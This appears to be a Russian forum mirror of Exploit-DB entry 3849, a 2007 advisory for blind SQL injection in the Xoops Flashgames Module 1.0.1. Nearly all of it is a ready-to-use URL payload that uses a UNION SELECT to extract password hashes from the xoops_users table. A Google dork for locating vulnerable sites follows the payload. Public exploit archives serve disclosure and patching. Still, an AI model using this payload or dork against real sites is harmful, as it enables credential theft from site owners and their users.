- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3849
- Проверка EDB
-
- Пройдено
- Автор
- MEHMET INCE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2543
- Дата публикации
- 2007-05-04
Код:
================================================================
Xoops Flashgames Module 1.0.1 Remote Blind SQL Injection
================================================================
Bulan: Cyber-security.org
================================================================
Exploit:
/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
================================================================
Google dork: inurl:modules/flashgames/
================================================================
# milw0rm.com [2007-05-04]- Источник
- www.exploit-db.com
